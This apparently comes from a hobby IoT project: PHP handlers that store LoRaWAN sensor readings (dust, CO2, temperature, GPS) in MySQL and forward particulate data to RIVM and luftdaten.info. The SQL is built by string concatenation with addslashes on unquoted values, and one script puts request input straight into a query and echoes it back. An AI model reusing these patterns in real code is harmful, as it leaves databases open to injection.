if($data->dev_id == 'ttn_apld_dust_20180000000000000027') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement290 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement291 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement292 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement293 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000028':
if($data->dev_id == 'ttn_apld_dust_20180000000000000028') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement286 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement287 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement288 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement289 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000029':
if($data->dev_id == 'ttn_apld_dust_20180000000000000029') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement294 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement295 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement296 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement297 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '006F301517B57BF3':
if($data->dev_id == 'ttn_apld_dust_20180000000000000031') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement298 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement299 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement300 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement301 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001A':
if($data->dev_id == 'ttn_apld_dust_000000000000001a') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement85 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001B':
if($data->dev_id == 'ttn_apld_dust_000000000000001b') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement86 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001C':
if($data->dev_id == 'ttn_apld_dust_000000000000001c') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement87 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001D':
if($data->dev_id == 'ttn_apld_dust_000000000000001d') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement88 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001E':
if($data->dev_id == 'ttn_apld_dust_000000000000001e') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement89 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001F':
if($data->dev_id == 'ttn_apld_dust_000000000000001f') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement90 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '00BC52F6E1DE255D':
if($data->dev_id == 'atranco_dustsensor_02') {
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement91 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '005E7AC9D7AE97D6':
if($data->dev_id == 'atranco_sds011_03') {
if(isset($data->payload_fields->analog_in_0)) {
$pm10 = $data->payload_fields->analog_in_0;
$sql = 'INSERT INTO measurement127 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_1)) {
$pm25 = $data->payload_fields->analog_in_1;
$sql = 'INSERT INTO measurement128 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm25);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($pm10) && isset($pm25)) {
$sendToRIVM = true;
$rivmSensorName = 'AtrancoSDS011PM10 lat=52.23574,lon=5.95375';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-altranco3';
}
}
break;
case '0077BD6073272BA9':
if($data->dev_id == 'dev_id_001') {
if(isset($data->payload_fields->analog_in_0)) {
$pm10 = $data->payload_fields->analog_in_0;
$sql = 'INSERT INTO measurement129 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_1)) {
$pm25 = $data->payload_fields->analog_in_1;
$sql = 'INSERT INTO measurement130 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm25);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($pm10) && isset($pm25)) {
$sendToRIVM = true;
$rivmSensorName = 'HansSSDS011PM10 lat=52.1450674,lon=6.20458898';
}
}
break;
case '00C08BC53133CA8C':
if($data->dev_id == 'rfsee_air_mjs_trial') {
if(isset($data->payload_fields->temperature_1)) {
$sql = 'INSERT INTO measurement167 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_2)) {
$sql = 'INSERT INTO measurement168 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_2);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_9)) {
$sql = 'INSERT INTO measurement302 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_9);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_8)) {
$sql = 'INSERT INTO measurement303 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_8);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '00CEC13936F2B303':
if($data->dev_id == 'dev_id_002') {
if(isset($data->payload_fields->temperature_2)) {
$sql = 'INSERT INTO measurement147 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_2);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_3)) {
$sql = 'INSERT INTO measurement148 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_3);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_4)) {
$sql = 'INSERT INTO measurement149 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_4);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_0)) {
$pm10 = $data->payload_fields->analog_in_0;
$sql = 'INSERT INTO measurement160 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_1)) {
$pm25 = $data->payload_fields->analog_in_1;
$sql = 'INSERT INTO measurement161 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm25);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($pm10) && isset($pm25)) {
$sendToRIVM = true;
$rivmSensorName = 'HansSSDS011PM10 lat=52.1450674,lon=6.20458898';
}
}
break;
case '70B3D549905D7542':
if($data->dev_id == 'lopysense01') {
if(isset($data->payload_fields->temperature_1)) {
$sql = 'INSERT INTO measurement102 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_2)) {
$sql = 'INSERT INTO measurement103 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_2);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_3)) {
$sql = 'INSERT INTO measurement104 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_3);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_4)) {
$sql = 'INSERT INTO measurement105 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_4);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->accelerometer_5)) {
if(isset($data->payload_fields->accelerometer_5->x)) {
$sql = 'INSERT INTO measurement106 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->accelerometer_5->x);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->accelerometer_5->y)) {
$sql = 'INSERT INTO measurement107 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->accelerometer_5->y);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->accelerometer_5->z)) {
$sql = 'INSERT INTO measurement108 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->accelerometer_5->z);
//echo $sql;
$result = mysqlquery($sql);
}
}
if(isset($data->payload_fields->analog_in_7)) {
$sql = 'INSERT INTO measurement109 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_7);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_6)) {
$sql = 'INSERT INTO measurement110 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_6);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case 'A81758FFFE034AFA':
if($data->dev_id == 'ersdesk') {
if(isset($data)) {
logerror('Ersdesk: '.json_encode($data));
$elsysArray = getElsysArray($data->payload_raw);
logerror('Hollander ERS: '.json_encode($elsysArray));
if(isset($elsysArray['temperature'])) {
$sql = 'INSERT INTO measurement133 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['temperature']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['humidity'])) {
$sql = 'INSERT INTO measurement134 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['humidity']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['light'])) {
$sql = 'INSERT INTO measurement135 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['light']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['pir'])) {
$sql = 'INSERT INTO measurement136 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['pir']);
//echo $sql;
//$result = mysqlquery($sql);
}
if(isset($elsysArray['vdd'])) {
$sql = 'INSERT INTO measurement137 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['vdd']/1000);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['occupancy'])) {
$sql = 'INSERT INTO measurement138 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['occupancy']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['irtempint'])) {
$sql = 'INSERT INTO measurement284 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['irtempint']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['irtempext'])) {
$sql = 'INSERT INTO measurement285 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['irtempext']);
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '58A0CB0000102AAD':
if($data->dev_id == 'tbdw100deursensor') {
if(isset($data)) {
logerror('tbdw100deursensor: '.json_encode($data));
//$sql = 'INSERT INTO measurement133 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
//$result = mysqlquery($sql);
}
}
break;
case '58A0CB0000101BE4':
if($data->dev_id == 'tbms100pir') {
logerror('tbms100pir: '.json_encode($data));
$arrTabs = getTabsArrayPir($data->payload_raw);
logerror('tbms100pir: '.json_encode($arrTabs));
if(isset($arrTabs['occupied'])) {
$sql = 'INSERT INTO measurement269 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['occupied']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['accuremaining'])) {
$sql = 'INSERT INTO measurement270 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['accuremaining']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['accuvoltage'])) {
$sql = 'INSERT INTO measurement271 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['accuvoltage']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['time'])) {
$sql = 'INSERT INTO measurement272 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['time']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['motioncount'])) {
$sql = 'INSERT INTO measurement273 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['motioncount']);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '58A0CB00001032E6':
if($data->dev_id == 'tbhv100healthyhome') {
logerror('tbhv100healthyhome: '.json_encode($data));
$arrTabs = getTabsArrayHealtyHome($data->payload_raw);
logerror('tbhv100healthyhome: '.json_encode($arrTabs));
if(isset($arrTabs['accuremaining'])) {
$sql = 'INSERT INTO measurement274 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['accuremaining']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['accuvoltage'])) {
$sql = 'INSERT INTO measurement275 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['accuvoltage']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['temperature'])) {
$sql = 'INSERT INTO measurement276 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['temperature']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['humidity'])) {
$sql = 'INSERT INTO measurement277 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['humidity']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['co2'])) {
$sql = 'INSERT INTO measurement278 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['co2']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['voc'])) {
$sql = 'INSERT INTO measurement279 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['voc']);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '58A0CB00001016E0':
if($data->dev_id == 'tbhh100temphum') {
if(isset($data)) {
logerror('tbhh100temphum: '.json_encode($data));
//$sql = 'INSERT INTO measurement133 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
//$result = mysqlquery($sql);
}
}
break;
case '70B3D5499655534A':
if($data->dev_id == 'lopytrack01') {
if(isset($data->payload_fields->gps_1)) {
$sql = 'INSERT INTO gpslocation67 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->gps_1->latitude.', Lon='.addslashes($data->payload_fields->gps_1->longitude));
//echo $sql;
$result = mysqlquery($sql);
/*
$last_id = mysql_insert_id($connection);
//logerror('Result: '.$last_id);
foreach($data->metadata->gateways as $gateway)
{
$json = '{'."\n";
$json .= '"time":"'.substr($data->metadata->time, 0, 23).'",'."\n";
$json .= '"devid":"'.$data->dev_id.'",'."\n";
$json .= '"appid":"'.$data->app_id.'",'."\n";
$json .= '"gwaddr":"'.$gateway->gtw_id.'",'."\n";
$json .= '"snr":"'.$gateway->snr.'",'."\n";
$json .= '"rssi":"'.$gateway->rssi.'",'."\n";
$json .= '"freq":"'.$data->metadata->frequency.'",'."\n";
$json .= '"datarate":"'.$data->metadata->data_rate.'",'."\n";
$json .= '"lat":"'.$data->payload_fields->gps_1->latitude.'",'."\n";
$json .= '"lon":"'.$data->payload_fields->gps_1->longitude.'",'."\n";
$json .= '"appeui":"70B3D57EF0006373",'."\n";
$json .= '"alt":"'.$data->payload_fields->gps_1->altitude.'",'."\n";
$json .= '"accuracy":"0.5",'."\n";
$json .= '"provider":"gps",'."\n";
$json .= '"user_id":"<NAME>"'."\n";
//$json .= ', "experiment":"Industrial IT GPS tracker Test"'."\n";
$json .= '}';
logerror("TTN MapperJson: ".$json);
$sql1 = 'INSERT INTO gpsgateway SET Gpslocationid=\''.$last_id.'\', Gwid=\''.addslashes($gateway->gtw_id).'\', Channel=\''.addslashes($gateway->channel).'\', Rssi=\''.addslashes($gateway->rssi).'\', Snr=\''.addslashes($gateway->snr).'\'';
//echo $sql1;
logerror("GPS data: ".$sql1);
$result1 = mysqlquery($sql1);
$url = "http://ttnmapper.org/api/";
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, array("Content-type: application/json"));
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $json);
logerror("voor curl");
$json_response = curl_exec($curl);
logerror("na curl");
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
logerror("curl status: ".$status);
if ( $status != 200 ) {
logerror("Error: call to URL $url failed with status $status, response $json_response, curl_error " . curl_error($curl) . ", curl_errno " . curl_errno($curl));
die("Error: call to URL $url failed with status $status, response $json_response, curl_error " . curl_error($curl) . ", curl_errno " . curl_errno($curl));
}
logerror("curl voor close");
curl_close($curl);
logerror("curl na close");
logerror("TTN MapperJson response: ".$json_response);
$response = json_decode($json_response, true);
logerror("TTN MapperJson responsejson: ".json_encode( $response));
}
*/
}
}
break;
case 'A81758FFFE034A22':
if($data->dev_id == 'ers') {
if(isset($data)) {
logerror('Hollander ERS raw: '.json_encode($data));
$elsysArray = getElsysArray($data->payload_raw);
logerror('Hollander ERS: '.json_encode($elsysArray));
if(isset($elsysArray['temperature'])) {
$sql = 'INSERT INTO measurement139 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['temperature']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['humidity'])) {
$sql = 'INSERT INTO measurement140 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['humidity']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['light'])) {
$sql = 'INSERT INTO measurement141 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['light']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['pir'])) {
$sql = 'INSERT INTO measurement142 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['pir']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['vdd'])) {
$sql = 'INSERT INTO measurement143 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['vdd']/1000);
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case 'A81758FFFE0324E5':
if($data->dev_id == 'ersco2') {
if(isset($data)) {
logerror('Hollander ERS CO2 raw: '.json_encode($data));
$elsysArray = getElsysArray($data->payload_raw);
logerror('Hollander ERS CO2: '.json_encode($elsysArray));
if(isset($elsysArray['temperature'])) {
$sql = 'INSERT INTO measurement151 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['temperature']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['humidity'])) {
$sql = 'INSERT INTO measurement152 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['humidity']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['light'])) {
$sql = 'INSERT INTO measurement153 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['light']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['pir'])) {
$sql = 'INSERT INTO measurement154 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['pir']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['co2'])) {
$sql = 'INSERT INTO measurement155 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['co2']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['vdd'])) {
$sql = 'INSERT INTO measurement156 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['vdd']/1000);
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case 'A81758FFFE03E88E':
if($data->dev_id == 'ersco2bev') {
if(isset($data)) {
logerror('Hollander ERS CO2 bev raw: '.json_encode($data));
$elsysArray = getElsysArray($data->payload_raw);
logerror('Hollander ERS CO2 bev: '.json_encode($elsysArray));
if(isset($elsysArray['temperature'])) {
$sql = 'INSERT INTO measurement304 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['temperature']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['humidity'])) {
$sql = 'INSERT INTO measurement305 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['humidity']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['light'])) {
$sql = 'INSERT INTO measurement306 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['light']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['pir'])) {
$sql = 'INSERT INTO measurement307 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['pir']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['co2'])) {
$sql = 'INSERT INTO measurement308 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['co2']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['vdd'])) {
$sql = 'INSERT INTO measurement309 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['vdd']/1000);
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
}
if($sendToRIVM) {
logerror('RIVM sensorname: '.$rivmSensorName);
$d = new DateTime();
$now = $d->format('Y-m-d\TH:i:s');
$d->sub(new DateInterval('PT59S'));
$minuteBefore = $d->format('Y-m-d\TH:i:s');
$data_string = 'm_fw,id='.$rivmSensorName.',timestamp_from="'.$minuteBefore.'Z",timestamp_to="'.$now.'Z",PM10='.str_replace(',','.',$pm10).',PM10-eenheid="ug/m3",PM10-meetopstelling="SDS011",PM2.5='.str_replace(',','.',$pm25).',PM2.5-meetopstelling="SDS011"';
$ch = curl_init('http://influx.rivm.nl:8086/write?db=fw');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_USERPWD, '<PASSWORD>');
curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
}
if($sendToLuftDaten) {
// luftdaten.info
$luftdatenData = '{"software_version": "1", "sensordatavalues":[{"value_type":"P1","value":"'.str_replace(',','.',$pm10).'"},{"value_type":"P2","value":"'.str_replace(',','.',$pm25).'"}]}';
$ch1 = curl_init('https://api.luftdaten.info/v1/push-sensor-data/');
curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch1, CURLOPT_POSTFIELDS, $luftdatenData);
curl_setopt($ch1, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch1, CURLOPT_HTTPHEADER, array('Content-Type: application/json',
'X-Pin: 1',
'X-Sensor: '.$luftdatenSensorName));
$resultLuftDaten = curl_exec($ch1);
logerror('JSON to LuftDaten ('.$luftdatenSensorName.'): '.$luftdatenData);
logerror('Result from LuftDaten: '.$resultLuftDaten);
}
}
//{"app_id":"industrialit","dev_id":"node1","hardware_serial":"0000000002E00612","port":1,"counter":8416,"payload_raw":"MTYuNzszOC4xAGxkIQ==","payload_fields":{"byte1":49,"byte2":54,"byte3":46,"byte4":55,"byte5":59,"byte6":51,"byte7":56,"byte8":46,"byte9":49},"metadata":{"time":"2017-06-04T20:54:21.770859698Z","frequency":867.1,"modulation":"LORA","data_rate":"SF7BW125","coding_rate":"4/5","gateways":[{"gtw_id":"eui-aa555a0000088213","timestamp":2927612339,"time":"2017-06-04T20:54:19.648782Z","channel":3,"rssi":-118,"snr":-6,"latitude":52.21176,"longitude":5.96243,"altitude":65}]},"downlink_url":"https://integrations.thethingsnetwork.org/ttn-eu/api/v2/down/industrialit/cloudscada?key=<KEY>"}
?>
<file_sep><script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-100353310-1', 'auto');
ga('send', 'pageview');
</script>
<script type="text/javascript">
window.smartlook||(function(d) {
var o=smartlook=function(){ o.api.push(arguments)},h=d.getElementsByTagName('head')[0];
var c=d.createElement('script');o.api=new Array();c.async=true;c.type='text/javascript';
c.charset='utf-8';c.src='https://rec.smartlook.com/recorder.js';h.appendChild(c);
})(document);
smartlook('init', 'ec0a1db895268f5147945b6ff6c3e176bd0006a6');
</script><file_sep><?php
include('db.php');
if(!is_numeric($_REQUEST['lastminute'])) {
die("Invalid Id parameter");
}
var_dump($_REQUEST);
$sql = 'INSERT INTO measurement26 SET Moment=NOW(), Tagvalue='.$_REQUEST['lastminute'];
echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastmessage=NOW() WHERE Id = 10';
echo $sql;
$result = mysqlquery($sql);
?><file_sep><?php
set_time_limit(60);
include('db.php');
logerror('start loradata');
//logerror("Postcount: ". count($_POST));
//logerror(implode(",", $_POST));
//logerror("Requestcount: ". count($_REQUEST));
//logerror(implode(",", $_REQUEST));
//logerror("Getcount: ". count($_GET));
//logerror(implode(",", $_GET));
//$data = json_decode(file_get_contents('php://input'));
//logerror($data);
//logerror($HTTP_RAW_POST_DATA);
//$data = json_decode(file_get_contents('php://stdin'));
//logerror($data);
//logerror("Rawpostttnmapper: ".$HTTP_RAW_POST_DATA);
//var_dump($data);
echo 'Thanks';
$ruweData = file_get_contents('php://input');
if($ruweData != null) {
$sql = 'INSERT INTO loraraw SET Moment=NOW(), Data= \''.addslashes($ruweData).'\'';
logerror('sql: '.$sql);
//echo $sql;
$result = mysqlquery($sql);
$dateNow = date('Y-m-d H:i:s');
$data = json_decode($ruweData);
if(addslashes($data->payload_fields->gps_1->latitude) > 86 || addslashes($data->payload_fields->gps_1->latitude) < -86) {
logerror('Invalid latitude');
die('Invalid latitude');
}
if(addslashes($data->payload_fields->gps_1->longitude) > 180 || addslashes($data->payload_fields->gps_1->longitude) < -180) {
logerror('Invalid longitude');
die('Invalid longitude');
}
switch($data->hardware_serial) {
case '0000000002E00615':
if(($data->payload_fields->analog_in_2*100) < 300) {
